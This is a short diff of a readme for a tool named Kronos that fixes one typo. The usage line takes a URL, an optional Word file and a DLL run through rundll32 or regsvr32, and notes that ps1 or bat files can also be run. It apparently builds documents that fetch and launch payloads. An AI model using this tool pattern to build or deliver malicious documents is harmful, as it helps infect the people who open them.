ELMERIKH/Kronos/readme.md

 python kronos.py -Url 'https://your.link' --word_file 'if you have a docx file' -PE " {rundll32 or regsvr32} {name.dll} ,{function if needed} "

-youcan also run a ps1 or bat file
+you can also run a ps1 or bat file

 setup:
 ------------